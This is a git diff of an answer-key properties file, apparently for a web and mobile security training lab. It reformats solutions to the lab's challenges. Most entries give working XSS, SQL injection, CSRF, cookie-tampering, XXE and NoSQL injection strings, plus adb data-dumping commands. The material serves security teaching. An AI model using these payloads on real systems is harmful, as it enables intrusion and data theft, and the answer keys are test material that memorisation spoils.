\ No newline at end of file
diff --git a/src/main/resources/i18n/cheatsheets/solutions.properties b/src/main/resources/i18n/cheatsheets/solutions.properties
index bea364ba1..ab01bf198 100644
--- a/src/main/resources/i18n/cheatsheets/solutions.properties
+++ b/src/main/resources/i18n/cheatsheets/solutions.properties
@@ -1,78 +1,78 @@
-0dbea4cb5811fff0527184f99bd5034ca9286f11.solution=Stop the request with a proxy and change the "username" parameter to be equal to "admin"
-453d22238401e0bf6f1ff5d45996407e98e45b07.solution=To complete the lesson, the attack string is the following: "https://hostname:port/root/grantComplete/csrfLesson?userId=tempId"
-cd7f70faed73d2457219b951e714ebe5775515d8.solution=Input is being filtered. To complete this challenge, enter the following attack string: <iframe src='#' onload='alert("XSS")'></iframe>
-2dc909fd89c2b03059b1512e7b54ce5d1aaa4bb4.solution=The user Ids in this challenge follow a sequence 1,3,5 etc. The Hidden Users ID is 11
-94cd2de560d89ef59fc450ecc647ff4d4a55c15d.solution=To complete this challenge, you must force another user to submit a post request. The easiest way to achieve this is to force the user to visit a custom webpage that submits the post request. This means the webpage needs to be accessible. It can be accessed via a HTTP server, a public Dropbox link, a shared file area. The following is an example webpage that would complete the challenge
The class form function should be used to create an iframe that forces the user to visit this attack page.
-b70a84f159876bb9885b6e0087d22f0a52abbfcf.solution=Use the login function with usernames like admin, administrator, root, etc to find administrator email accounts. Use the forgotten password functionality to change the password for the email address recovered. Inspect the response of the password reset request to see what the password was reset to. Use this password to login!
-a4bf43f2ba5ced041b03d0b3f9fa3541c520d65d.solution=Base 64 Decode the "checksum" cookie in the request to find it equals "userRole=user". Change the value of userRole to be administrator instead. The cookies new value should be "dXNlclJvbGU9YWRtaW5pc3RyYXRvcg==" when you replace it.
-5ca9115f3279b9b9f3308eb6a59a4fcd374846d6.solution=To complete this challenge, you must force an admin to submit a post request. The easiest way to achieve this is to force the admin to visit a custom webpage that submits the post request. This means the webpage needs to be accessible. It can be accessed via a HTTP server, a public Dropbox link, a shared file area. The following is an example webpage that would complete the challenge
The class form function should be used to create an iframe that forces the admin to visit this attack page.
-891a0208a95f1791287be721a4b851d4c584880a.solution=To complete this challenge, move every character five places back to get the following plaintext; The result key for this lesson is the following string; mylovelyhorserunningthroughthefieldwhereareyougoingwithyourbiga
-b6432a6b5022cb044e9946315c44ab262ab59e88.solution=To perform the CSRF correctly use the following attack string; https://hostname:port/user/redirect?to=https://hostname:port/root/grantComplete/unvalidatedredirectlesson?userid=tempId
-d4e2c37d8f1298fcaf4edcea7292cb76e9eab09b.solution=Input is being filtered. To complete this challenge, enter the following attack string; <input type="button" onmouseup="alert('XSS')"/>
-20e755179a5840be5503d42bb3711716235005ea.solution=To complete this challenge, you can embed the CSRF request in an iframe very easily as follows; <iframe src="https://hostname:port/user/csrfchallengeone/plusplus?userid=exampleId"></iframe> Then you need another user to be hit with the attack to mark it as completed
-544aa22d3dd16a8232b093848a6523b0712b23da.solution=To complete this challenge, the following attack strings will return all rows from the table: " or "1" = "1 " or "a" != "
The query is not parameterising the query and is concatenating the user data to the query. A user only needs to use a double quote to escape the context of a String and perform the SQL injection
-52c5394cdedfb2e95b3ad8b92d0d6c9d1370ea9a.solution=The url of the result key is hidden in a div with an ID "hiddenDiv" that can be found in the source HTML of the lesson. User can also right click and inspect the element.
-ca8233e0398ecfa76f9e05a49d49f4a7ba390d07.solution=The following attack vector will work wonderfully; <script>alert('XSS')</script>
-0e9e650ffca2d1fe516c5d7b0ce5c32de9e53d1e.solution=Use the password change function to send a functionality request. Stop this request with a proxy, and take the value of the "current" cookie. Base 64 Decode this two times. Modify the value to an administrator username such as "admin". Encode this two times and change the value of the current cookie to reflect this change. Sign in as the username you set your current cookie's value to with the new password you set.
-9533e21e285621a676bec58fc089065dec1f59f5.solution=Use a proxy to stop the request to complete the lesson. Change the value of the "lessonComplete" cookie to "lessonComplete" to complete the lesson.
-408610f220b4f71f7261207a17055acbffb8a747.solution=The lesson can be completed with the following attack string ' OR '1' = '1
-0709410108f91314fb6f7721df9b891351eb2fcc.solution=To complete this challenge, inspect the javascript that executes when the "check" is performed. The encryption key is stored in the "theKey" parameter. The last IF statement in the script checks if the output is equal to the encrypted Result Key. So the key and ciphertext is stored in the script. You can use this information to decrypt the result key manually with the vigenere cipher. You can also modify the javascript to decode the key for you. To do this, make the following changes; 1) Change the line "input\_char\_value += alphabet . indexOf (theKey . charAt (theKey\_index));" to: "input\_char\_value -= alphabet . indexOf (theKey . charAt (theKey\_index));" This inverts the process to decrypt instead of decrypt 2) Add the following line to the end of the script: $("#resultDiv").html("Decode Result: " + output);
-6319a2e38cc4b2dc9e6d840e1b81db11ee8e5342.solution=Input is being filtered. What is being filtered out is being completely removed. The filter does not act in a recursive fashion so with enough nested javascript triggers, it can be defeated. To complete this challenge, enter the following attack string; <input type="button" oncliconcliconclickkk="alert('XSS')"/>
-f771a10efb42a79a9dba262fd2be2e44bf40b66d.solution=To complete this challenge, the following attack string will return all rows from the table: test'or''!='2@test.com The input is validated as an email address before it is passed to the DB.
-5dda8dc216bd6a46fccaa4ed45d49404cdc1c82e.solution=To complete this challenge, you must craft a second statement to return Mary Martin's credit card number as the current statement only returns the customerName attribute. The following string will perform this; ' UNION ALL SELECT creditCardNumber FROM customers WHERE customerName = 'Mary Martin The filter in this challenge is difficult to get around. But the 'UNION' operator is not being filtered. Using the UNION command you are able to return the results of custom statements.
-201ae6f8c55ba3f3b5881806387fbf34b15c30c2.solution=The lesson is encoded in Base64. Most proxy applications include a decoder for this encoding.
-82e8e9e2941a06852b90c97087309b067aeb2c4c.solution=The user Id's in this challenge are hashed using MD5. You can google the ID's to find their plain text if you have an internet connection to find their plain text. The sequence of ID's is as follows; 2, 3, 5, 7, 9, 11 The next number in the sequence is 13. Modify the request with a proxy so that the id is the MD5 of 13 (c51ce410c124a10e0db5e4b97fc2af39)
-a84bbf8737a9ca749d81d5226fc87e0c828138ee.solution=To complete this challenge without prior knowledge, a user must exploit an SQL injection flaw in a 'VIP Coupon Check' call. To find this function call they must deobfusticate the JavaScript file in the challenge. The address of the function is challenges/8edf0a8ed891e6fef1b650935a6c46b03379a0eebab36afcd1d9076f65d4ce62VipCouponCheck on the exposed server. The parameter vulnerable to SQL injection in the POST request call to this URL is couponCode. There is no filter in this challenge so using ' union select itemId, percentOff, CONCAT('This is the couponCode: ', couponCode, ' ') from vipCoupons; -- as the vulnerable parameter value will retrieve the necessary coupon.
-e0ba96bb4c8d4cd2e1ff0a10a0c82b5362edf998.solution=The filter in this challenge is removing all single quotes. However as there are two user parameters being utilised in the challenges login query, backslashes can be used to escape the user input's intended string context. The challenge can be completed with a user name of a Backslash and a password of OR 1 = 1 AND idusers = 7; -- (Space after the -- is important!) so that you are signed in as the admin user.
-ad332a32a6af1f005f9c8d1e98db264eb2ae5dfe.solution=This challenge can be defeated by encoding SQL Injection attacks for \x UTF. For Example, the following will reveal the challenges result key; \\x27\\x20UNION\\x20SELECT\\x20userAnswer\\x20FROM\\x20users\\x20WHERE\\x20userName\\x20\\x3D\\x20\\x27Brendan\\x27\\x3B\\x20--\\x20
-182f519ef2add981c77a584380f41875edc65a56.solution=This challenge does not require a solution to be formed in XHTML to be detected. One way to pass this challenge is to submit the following; http://test"oNmouseover=alert(123);//
-fccf8e4d5372ee5a73af5f862dc810545d19b176.solution=This challenge does not require a solution to be formed in XHTML to be detected. One way to pass this challenge is to submit the following; http://test""onmouseover=alert(123);//
-0a37cb9296ff3763f7f3a45ff313bce47afa9384.solution=To guarantee completing this CSRF Challenge in a single attempt, a user must craft a CSRF attack that sends a POST request, to the request described in the challenge write up, with all of the possible CSRF tokens for the challenge. The only possible csrf tokens for this challenge are 0, 1 and 2.
-04a5bd8656fdeceac26e21ef6b04b90eaafbd7d5.solution=To guarantee completing this CSRF Challenge in a single attempt, a user must craft a CSRF attack that sends a POST request, to the request described in the challenge write up, with all of the possible CSRF tokens for the challenge. The only possible csrf tokens for this challenge are c4ca4238a0b923820dcc509a6f75849b, c81e728d9d4c2f636f067f89cc14862c and eccbc87e4b5ce2fe28308fd9f2a7baf3.
-853c98bd070fe0d31f1ec8b4f2ada9d7fd1784c5.solution=To complete this challenge, a user must exploit an SQL Wild Card Enumeration in the 'Retrieve Token' function to retrieve other users CSRF token (Submit a percentage sign - you may need to encode it to %25). This information must be utilised to launch a CSRF attack against them before they refresh the challenge page themselves. Once a victim refreshes the challenge page, their token updates. Social Engineering will need to be utilised to successfully complete this challenge.
-3d5b46abc6865ba09aaff98a8278a5f5e339abff.solution=View the source of this challenge and inspect the JavaScript at the end of the page. It contains two functions, and one of them is for a HTML element that is not in the level. This function is an admin function and reveals a URL very similar to the user function. Send a valid post request, as described by the JavaScript, to that URL to retrieve the result key.
-c7ac1e05faa2d4b1016cfcc726e0689419662784.solution=View the source of this challenge and inspect the JavaScript at the end of the page. You can deobfusticate the JavaScript with an on line web tool, give it a Google. The script contains two functions, and one of them is for a HTML element that is not in the level. This function is an admin function and reveals a URL very similar to the user function. Send a valid post request, as described by the JavaScript, to that URL to retrieve the result key.
-b3cfd5890649e6815a1c7107cc41d17c82826cfa.solution=There are a number of ways to defeat the crypto and get the encryption key in this challenge. The quickest way is to submit base64 encoded spaces. The crypto XOR's the spaces with the key and returns the resultant 'cipher text which is the encryption key.
-ced925f8357a17cfe3225c6236df0f681b2447c4.solution=Users must discover the session id for this sub application is very weak. The default session ID for a guest will be 00000001 base64'd twice. The admin's session ID is TURBd01EQXdNREF3TURBd01EQXdPUT09 (0000000000000009 when decoded).
-c6841bcc326c4bad3a23cd4fa6391eb9bdb146ed.solution=This challenge does not require a solution to be formed in XHTML to be detected. One way to pass this challenge is to submit the following; http://""onmouseover=alert(123);//
-53a53a66cb3bf3e4c665c442425ca90e29536edd.solution=The Admin credentials are stored in plain text in a db file. Go to /data/data/insecuredata/databases and run the following command " Strings Members" or "cat Members". To get to root CLI on the VM press alt F1.
-307f78f18fd6a87e50ed6705231a9f24cd582574.solution=The Admin credentials are encoded in a db file. Go to /data/data/insecuredata1/databases and cat the Users.db file. Burp has a decoder which will reveal the key, alternatively there are online tools which can also do this
-da3de2e556494a9c2fb7308a98454cf55f3a4911.solution=The Admin credentials are hashed (but not salted) in a db file. Go to /data/data/insecuredata2/databases and cat the db file called Password.db. The key is a password which has been hashed using MD5, there are online tools which will attempt to crack this hashed value.
-335440fef02d19259254ed88293b62f31cccdd41.solution=The Login is vulnerable to SQL injection, Admin ' OR 1 = 1 ; -- will work in the username field and anything in the password field (So a blank field error does not occur).
-a3f7ffd0f9c3d15564428d4df0b91bd927e4e5e4.solution=The login is vulnerable to SQL injection however, some input is being filtered. OR + 1 = 1 will be filtering into spaces of comments. anyOtherValue=anyOtherValue will work as well as 0r.
-e635fce334aa61fdaa459c21c286d6332eddcdd3.solution=The login is vulnerable to SQL injection however there is filtering in place, to get an OR in the statement use OORR, to get a comment use -OR-. So the following statement should work: Admin ' oorr 'a' = 'a' ; -or-
-ef6496892b8e48ac2f349cdd7c8ecb889fc982af.solution=The chat has not been encrypted but encoded using hex, this can be decoded using burp or the following site:http://www.asciitohex.com/
-3f010a976bcbd6a37fba4a10e4a057acc80bdc09.solution=The chat has been encrypted using DES. The same key is used every time and the key is stored insecurely within the app package.
-63bc4811a2e72a7c833962e5d47a41251cd90de3.solution=The chat has been encrypted using AES (with CBC mode). Multiple keys are used this time but keys are stored insecurely on the App. key 1 decrypts message 1, key 2 decrypts message 2 and so forth.
-2ab09c0c18470ae5f87d219d019a1f603e66f944.solution=The key is stored in the source code of the App, get dex2jar and use it to turn the apk to a jar file, then open the jar and find the key in the main class.
-f16bf2ab1c1bf400d36330f91e9ac6045edcd003.solution=The key is stored in the source code of the App, get dex2jar and use it to turn the apk to a jar file, then open the jar. The key is present within a conditional statement in the class called Triangle.
-9e46e3c8bde42dc16b9131c0547eedbf265e8f16.solution=The key is not present in the code, however a check for the key is. This can be reverse engineered and the code extracted and run as a java class. Running this java class after changing the check to print the key will reveal it.
-1506f22cd73d14d8a73e0ee32006f35d4f234799.solution=Logs are stored insecurely on the App. These contain the key. The logs can be found in a directory called "files" within the app package in the data/data directory. Every time the app is interacted with, new logs are generated.
-ed732e695b85baca21d80966306a9ab5ec37477f.solution=In this challenge you must craft a HTTP request to reset an admin accounts password. The HTTP request is described in the javascript contained in the challenge page (The last function in the script). The token value in this request must be a base 64 encoded date time value such as the following;
Thu Aug 28 18:48:10 BST 2014
The token value must be less than 10 minutes from the servers time.
-cfbf7b915ee56508ad46ab79878f37fd9afe0d27.solution=To complete this challenge a user must craft a CSRF attack that sends a POST request, to the request described in the challenge write up, with their CSRF token. This CSRF Token will work on any user.
-9294ba32bdbd680e3260a0315cd98bf6ce8b69bd.solution=The first step in completing this challenge is to get an admin user's email address. Try to sign in as 'root' or 'superuser' to get one. To complete this challenge a user must use SQL Injection in the email Parameter in the GET request to the SecretQuestion servlet. The following email submission will achieve the response of the users secret answer (This example is URL Encoded)
You can then use this answer along with a user email address to complete the level.
-7153290d128cfdef5f40742dbaeb129a36ac2340.solution=To complete this challenge a user must send the server a request with the 'challengeRole' value set to 'nmHqLjQknlHs'. The challengeRole cookie is encoded with ATOM-128. The value 'nmHqLjQknlHs' when decoded is 'superuser'.
-145111e80400e4fd48bd3aa5aca382e9c5640793.solution=To complete this challenge a user must deobfusticate the javascript found in /couponCheck.js and extract the relevent cryptoinformation to manually decrypt a javascript array of encrypted coupons, or to manipulate the javascript so that it returns the decrypted coupons. The "des" function call reveals the Encryption key and the padding used by the algorithm. The "des" function in the javascript can be changed to decryption mode by changing the boolean argument to negative. The text to be decoded needs to be taken from the array of encrypted coupon codes. To recover the coupon code for free oranges you can run this command from your browsers console when opened in the context of the level's JSP page; des(chars_from_hex('0ba950d08830c8079bded71b852934453db8f4ffff1f5842'), chars_from_hex(bits[6]), 0, chars_from_hex('821fd38b9a7c0247') ? 1 : 0, chars_from_hex('821fd38b9a7c0247'));
-adc845f9624716eefabcc90d172bab4096fa2ac4.solution=To complete this challenge, a SQL Injection Flaw must be exploited to learn the name of the super admin in a request described in the module's javascript. This function is not used by the presented HTML. You must manually craft this request and include an injection attack through the BASE64 encoded cookie named 'currentPerson'. a simple "or"1"!="0 vector will work. Take the super admin's name and submit it encoded for BASE64 as the currentPerson cookie value in the request that is submitted when the Admin button is clicked. This will return the result key for the challenge.
-64070f5aec0593962a29a141110b9239d73cd7b3.solution=To complete this challenge, a SQL injection flaw must be exploited. The vulnerable paramater is 'subUserEmail'. It must be mostly well formed as an email address to get past the validation process. The following vector, which is URL encoded, will sign the user in as user 1.
'or'1'='1'union%0aselect%0auserName%0afrom%0ausers%0awhere''!='%40v
-1e3c02ad49fa9a9e396a3b268d7da8f0b647d8f9.solution=To complete this challenge, connect the android debug bridge to the VM and run adb logcat –d \ to dump logs to a text file. Trigger the key log by pressing the lotto button
-f40b0cd5d45327c9426675313f581cf70c7c7c28.solution=To complete this challenge, start the app, go to the command line of the VM using ALT F1 and then navigate to /sdcard/, pictorial logs are places there. Connect adb to the device and run the adb pull command on the logs.
-ba6e65e4881c8499b5e53eb33b5be6b5d0f1fb2c.solution=To complete this challenge, start the app, and login to get the key. you must login with an auth code. the code must be odd, must contain the numbers 2 and 4 and must be six digits long. previous codes may show up in a suggestion when typing the code in which will reveal this pattern.
-52885a3db5b09adc24f38bc453fe348f850649b3.solution=To complete this challenge, find jarsigner which comes with the jdk and in a command line run the following: jarsigner -verify -verbose -certs ReverseEngineer2.apk.
-3b1af0ad239325bf494c6e606585320b31612e72.solution=To complete this challenge, use adb pull to grab the key file and the key.db file from the app's /data/data/ directory. With the db password: Pa88w0rd1234 decrypt the database to get the key to the level. This will either require a small amount of coding or you can download and build sqlcipher. Finally there is an App on the playstore which can be used called SQLCipher Decrypt.
-0cdd1549e7c74084d7059ce748b93ef657b44457.solution=To complete this challenge, you need to login to the App. The password reset function rquires two answers which can be gathered from the logs on the App. The answers are chicken and meade. This will reset the password to a six digit code and allow you to login and view the key.
-368491877a0318e9a774ba5d648c33cb0165ba1e.solution=This challenge requires a bit of thinking to complete organically. First you must find some admin email addresses. The login function will return them when valid usernames are submitted. Try using root or superuser with any password. Use the email address in the secret question function to get that user's Secret Question. The secret question for each user is 'What is your favourite flower?'. There are only so many flowers. Any of the following flowers are valid answers. Root's favourite flower is 'Franklin Tree'.
Valid answers: Jade Vine, Corpse Flower, Gibraltar Campion, Franklin Tree, Middlemist Red, Chocolate Cosmos or Ghost Orchid
-6be5de81223cc1b38b6e427cc44f8b6a28d2bc96.solution=The shopping cart application does not validate the number of items you are buying. Set the orange amount to 1, apple amount to 0, banana amount to 0 and the pineapple amount to -101.
-3b14ca3c8f9b90c9b2c8cd1fba9fa67add1272a3.solution=The shopping cart application only ensures that the amount of items bought is a positive number. By buying 999295724 oranges, the total cost integer value will overflow and enter a negative state.
-b9d82aa7b46ddaddb6acfe470452a8362136a31e.solution=Enter a valid number in the submit box and click submit number. Capture the request in a HTTP proxy and modify the number to a negative value.
-bf847c4a8153d487d6ec36f4fca9b77749597c64.solution=Sign into the application with the generic admin default combination of 'admin' and 'password'.
-fcc2558e0a23b8420e173cf8029876cb887408d3.solution=To complete this challenge, you must force another user to submit a post request which contains a JSON payload. The easiest way to achieve this is to force the user to visit a custom web page that submits the post request. This means the web page needs to be accessible. It can be accessed via a HTTP server, a public Dropbox link, a shared file area. It is possible to use HTML forms to submit cross domain POST requets with JSON payloads by setting the enctype attribute to text/plain and then forming the JSON payload around the necessary equals symbol which normally deliminates the parameter name from the parameter value. The following is an example web page that would complete the challenge
The class form function should be used to create an iframe that forces the user to visit this attack page.
-6158a695f20f9286d5f12ff3f4d42678f4a9740c.solution=To complete this challenge, you must be able to capture the traffic of another user. The simplest way to simulate this would be to create a second user account and open it in a separate browser and open this challenge. You could then just steal the cookie straight from the browser. To demo how to solve this as expected you would actually open Wireshark and record the 2nd user opening the challenge. Filter the network capture for ip.dst == ShepherdInstanceIp, and find the unencrypted HTTP packet. Right click it and select 'Follow TCP stream'. You'll see the cookie in that dialog.
Once you have the token collected, in your original browser, click the button and intercept the request with a Proxy. Replace your cookie value with the one you collected from another user.
-de626470273c01388629e5a56ac6f17e2eef957b.solution=To complete this challenge you must first register an account. The account must have a unique name. The next step is to click the refresh balance button. Capture this request, and replay it with different account numbers until you find one with cash. If you are the first person to attempt this challenge, the account number 1 should have 10 million in it. Take note of the account number that has cash. Now fill out the 'Transfer Funds' form with any data. Capture that requets and change the receiver account number parameter to the value the sender account number parameter is currently equal to (This is your account number), change the sender account number to the identifier you noted earlier and set the transfer amount to as high as possible (must be some money left in account to work). Keep doing this untill your account has more than 5 million in it. Then open the level again or sign in / out of the account to get the result key
-dc89383763c68cba0aaa1c6f3fd4c17e9d49a805.solution=The following attack vectors will expose the result key over two queries.
Step One: test' AND (SELECT 7303 FROM(SELECT COUNT(*),CONCAT(0x716b6a7671,(SELECT MID((IFNULL(CAST(comment AS CHAR),0x20)),1,50) FROM sqlchalstoredproc.customers ORDER BY customerId LIMIT 2,1),0x71786b7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'hdTL'='hdTL
This will return an error revealing the first part of the key in the message with qxkzq1 added to the end for padding. remove those characters and record the rest of the key revealed.
Step Two: test' AND (SELECT 9441 FROM(SELECT COUNT(*),CONCAT(0x716b6a7671,(SELECT MID((IFNULL(CAST(comment AS CHAR),0x20)),51,50) FROM sqlchalstoredproc.customers ORDER BY customerId LIMIT 2,1),0x71786b7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'ilGf'='ilGf
This will reveal the second part of the key, padded with qkjvq at the start and qxkzq1 at the end. Remove the padding and add the rest to the previously revealed part of the result key. That is the key to solve this challenge.
-5b461ebe2e5e2797740cb3e9c7e3f93449a93e3a.solution=Connect to the device via adb and run the following command - adb shell content query --uri content://com.somewhere.hidden.SecretProvider/data
-c685f8102ae0128c2ab342df64699bb8209a0839.solution=One way to exploit this security risk is to escape the leading backslash that is added before apostrophes with another backslash. The following attack vector will solve the level;
\'or"1"="1"; -- 
-d7eaeaa1cc4f218abd86d14eefa183a0f8eb6298.solution=The database in this level utilises MongoDb which does NOT use SQL. Queries in MongoDb are done through JavaScript. You need to stop the request in an HTTP proxy and use the following JavaScript to exploit the vulnerability: ';return(true);var a='a
-f02ce6bcd0a822d245433533997eaf44379065f4.solution=This challenge is difficult to exploit and heavily depends on your user name. See this github ticket for more details. This was a vulnerability in Security Shepherd that was fixed
-df2ac757cc135dcb8ce5ea01f677c74f04b446d6.solution=To exploit this take Example 1, replace file:///etc/shadow with file:///usr/local/tomcat/briefcase.pulp and also replace <foo>&xxe;</foo> with <email>&xxe;</email>
-08b3dffd4b837ebe53d52e53b5bbbabf4a4ca9ae.solution=To exploit this view the source of the iframe where you'll see two functions for sending a request - leFormNew and leFormOld. The new one is for JSON and the old one uses XML where the developers left this one in place and can be exploited through XML injection. It is exploited the very same way as the XXE lesson.
\ No newline at end of file
+0dbea4cb5811fff0527184f99bd5034ca9286f11.solution = Stop the request with a proxy and change the "username" parameter to be equal to "admin"
+453d22238401e0bf6f1ff5d45996407e98e45b07.solution = To complete the lesson, the attack string is the following: "https://hostname:port/root/grantComplete/csrfLesson?userId=tempId"
+cd7f70faed73d2457219b951e714ebe5775515d8.solution = Input is being filtered. To complete this challenge, enter the following attack string: <iframe src='#' onload='alert("XSS")'></iframe>
+2dc909fd89c2b03059b1512e7b54ce5d1aaa4bb4.solution = The user Ids in this challenge follow a sequence 1,3,5 etc. The Hidden Users ID is 11
+94cd2de560d89ef59fc450ecc647ff4d4a55c15d.solution = To complete this challenge, you must force another user to submit a post request. The easiest way to achieve this is to force the user to visit a custom webpage that submits the post request. This means the webpage needs to be accessible. It can be accessed via a HTTP server, a public Dropbox link, a shared file area. The following is an example webpage that would complete the challenge
The class form function should be used to create an iframe that forces the user to visit this attack page.
+b70a84f159876bb9885b6e0087d22f0a52abbfcf.solution = Use the login function with usernames like admin, administrator, root, etc to find administrator email accounts. Use the forgotten password functionality to change the password for the email address recovered. Inspect the response of the password reset request to see what the password was reset to. Use this password to login!
+a4bf43f2ba5ced041b03d0b3f9fa3541c520d65d.solution = Base 64 Decode the "checksum" cookie in the request to find it equals "userRole=user". Change the value of userRole to be administrator instead. The cookies new value should be "dXNlclJvbGU9YWRtaW5pc3RyYXRvcg==" when you replace it.
+5ca9115f3279b9b9f3308eb6a59a4fcd374846d6.solution = To complete this challenge, you must force an admin to submit a post request. The easiest way to achieve this is to force the admin to visit a custom webpage that submits the post request. This means the webpage needs to be accessible. It can be accessed via a HTTP server, a public Dropbox link, a shared file area. The following is an example webpage that would complete the challenge
The class form function should be used to create an iframe that forces the admin to visit this attack page.
+891a0208a95f1791287be721a4b851d4c584880a.solution = To complete this challenge, move every character five places back to get the following plaintext; The result key for this lesson is the following string; mylovelyhorserunningthroughthefieldwhereareyougoingwithyourbiga
+b6432a6b5022cb044e9946315c44ab262ab59e88.solution = To perform the CSRF correctly use the following attack string; https://hostname:port/user/redirect?to=https://hostname:port/root/grantComplete/unvalidatedredirectlesson?userid=tempId
+d4e2c37d8f1298fcaf4edcea7292cb76e9eab09b.solution = Input is being filtered. To complete this challenge, enter the following attack string; <input type="button" onmouseup="alert('XSS')"/>
+20e755179a5840be5503d42bb3711716235005ea.solution = To complete this challenge, you can embed the CSRF request in an iframe very easily as follows; <iframe src="https://hostname:port/user/csrfchallengeone/plusplus?userid=exampleId"></iframe> Then you need another user to be hit with the attack to mark it as completed
+544aa22d3dd16a8232b093848a6523b0712b23da.solution = To complete this challenge, the following attack strings will return all rows from the table: " or "1" = "1 " or "a" != "
The query is not parameterising the query and is concatenating the user data to the query. A user only needs to use a double quote to escape the context of a String and perform the SQL injection
+52c5394cdedfb2e95b3ad8b92d0d6c9d1370ea9a.solution = The url of the result key is hidden in a div with an ID "hiddenDiv" that can be found in the source HTML of the lesson. User can also right click and inspect the element.
+ca8233e0398ecfa76f9e05a49d49f4a7ba390d07.solution = The following attack vector will work wonderfully; <script>alert('XSS')</script>
+0e9e650ffca2d1fe516c5d7b0ce5c32de9e53d1e.solution = Use the password change function to send a functionality request. Stop this request with a proxy, and take the value of the "current" cookie. Base 64 Decode this two times. Modify the value to an administrator username such as "admin". Encode this two times and change the value of the current cookie to reflect this change. Sign in as the username you set your current cookie's value to with the new password you set.
+9533e21e285621a676bec58fc089065dec1f59f5.solution = Use a proxy to stop the request to complete the lesson. Change the value of the "lessonComplete" cookie to "lessonComplete" to complete the lesson.
+408610f220b4f71f7261207a17055acbffb8a747.solution = The lesson can be completed with the following attack string ' OR '1' = '1
+0709410108f91314fb6f7721df9b891351eb2fcc.solution = To complete this challenge, inspect the javascript that executes when the "check" is performed. The encryption key is stored in the "theKey" parameter. The last IF statement in the script checks if the output is equal to the encrypted Result Key. So the key and ciphertext is stored in the script. You can use this information to decrypt the result key manually with the vigenere cipher. You can also modify the javascript to decode the key for you. To do this, make the following changes; 1) Change the line "input\_char\_value += alphabet . indexOf (theKey . charAt (theKey\_index));" to: "input\_char\_value -= alphabet . indexOf (theKey . charAt (theKey\_index));" This inverts the process to decrypt instead of decrypt 2) Add the following line to the end of the script: $("#resultDiv").html("Decode Result: " + output);
+6319a2e38cc4b2dc9e6d840e1b81db11ee8e5342.solution = Input is being filtered. What is being filtered out is being completely removed. The filter does not act in a recursive fashion so with enough nested javascript triggers, it can be defeated. To complete this challenge, enter the following attack string; <input type="button" oncliconcliconclickkk="alert('XSS')"/>
+f771a10efb42a79a9dba262fd2be2e44bf40b66d.solution = To complete this challenge, the following attack string will return all rows from the table: test'or''!='2@test.com The input is validated as an email address before it is passed to the DB.
+5dda8dc216bd6a46fccaa4ed45d49404cdc1c82e.solution = To complete this challenge, you must craft a second statement to return Mary Martin's credit card number as the current statement only returns the customerName attribute. The following string will perform this; ' UNION ALL SELECT creditCardNumber FROM customers WHERE customerName = 'Mary Martin The filter in this challenge is difficult to get around. But the 'UNION' operator is not being filtered. Using the UNION command you are able to return the results of custom statements.
+201ae6f8c55ba3f3b5881806387fbf34b15c30c2.solution = The lesson is encoded in Base64. Most proxy applications include a decoder for this encoding.
+82e8e9e2941a06852b90c97087309b067aeb2c4c.solution = The user Id's in this challenge are hashed using MD5. You can google the ID's to find their plain text if you have an internet connection to find their plain text. The sequence of ID's is as follows; 2, 3, 5, 7, 9, 11 The next number in the sequence is 13. Modify the request with a proxy so that the id is the MD5 of 13 (c51ce410c124a10e0db5e4b97fc2af39)
+a84bbf8737a9ca749d81d5226fc87e0c828138ee.solution = To complete this challenge without prior knowledge, a user must exploit an SQL injection flaw in a 'VIP Coupon Check' call. To find this function call they must deobfusticate the JavaScript file in the challenge. The address of the function is challenges/8edf0a8ed891e6fef1b650935a6c46b03379a0eebab36afcd1d9076f65d4ce62VipCouponCheck on the exposed server. The parameter vulnerable to SQL injection in the POST request call to this URL is couponCode. There is no filter in this challenge so using ' union select itemId, percentOff, CONCAT('This is the couponCode: ', couponCode, ' ') from vipCoupons; -- as the vulnerable parameter value will retrieve the necessary coupon.
+e0ba96bb4c8d4cd2e1ff0a10a0c82b5362edf998.solution = The filter in this challenge is removing all single quotes. However as there are two user parameters being utilised in the challenges login query, backslashes can be used to escape the user input's intended string context. The challenge can be completed with a user name of a Backslash and a password of OR 1 = 1 AND idusers = 7; -- (Space after the -- is important!) so that you are signed in as the admin user.
+ad332a32a6af1f005f9c8d1e98db264eb2ae5dfe.solution = This challenge can be defeated by encoding SQL Injection attacks for \x UTF. For Example, the following will reveal the challenges result key; \\x27\\x20UNION\\x20SELECT\\x20userAnswer\\x20FROM\\x20users\\x20WHERE\\x20userName\\x20\\x3D\\x20\\x27Brendan\\x27\\x3B\\x20--\\x20
+182f519ef2add981c77a584380f41875edc65a56.solution = This challenge does not require a solution to be formed in XHTML to be detected. One way to pass this challenge is to submit the following; http://test"oNmouseover=alert(123);//
+fccf8e4d5372ee5a73af5f862dc810545d19b176.solution = This challenge does not require a solution to be formed in XHTML to be detected. One way to pass this challenge is to submit the following; http://test""onmouseover=alert(123);//
+0a37cb9296ff3763f7f3a45ff313bce47afa9384.solution = To guarantee completing this CSRF Challenge in a single attempt, a user must craft a CSRF attack that sends a POST request, to the request described in the challenge write up, with all of the possible CSRF tokens for the challenge. The only possible csrf tokens for this challenge are 0, 1 and 2.
+04a5bd8656fdeceac26e21ef6b04b90eaafbd7d5.solution = To guarantee completing this CSRF Challenge in a single attempt, a user must craft a CSRF attack that sends a POST request, to the request described in the challenge write up, with all of the possible CSRF tokens for the challenge. The only possible csrf tokens for this challenge are c4ca4238a0b923820dcc509a6f75849b, c81e728d9d4c2f636f067f89cc14862c and eccbc87e4b5ce2fe28308fd9f2a7baf3.
+853c98bd070fe0d31f1ec8b4f2ada9d7fd1784c5.solution = To complete this challenge, a user must exploit an SQL Wild Card Enumeration in the 'Retrieve Token' function to retrieve other users CSRF token (Submit a percentage sign - you may need to encode it to %25). This information must be utilised to launch a CSRF attack against them before they refresh the challenge page themselves. Once a victim refreshes the challenge page, their token updates. Social Engineering will need to be utilised to successfully complete this challenge.
+3d5b46abc6865ba09aaff98a8278a5f5e339abff.solution = View the source of this challenge and inspect the JavaScript at the end of the page. It contains two functions, and one of them is for a HTML element that is not in the level. This function is an admin function and reveals a URL very similar to the user function. Send a valid post request, as described by the JavaScript, to that URL to retrieve the result key.
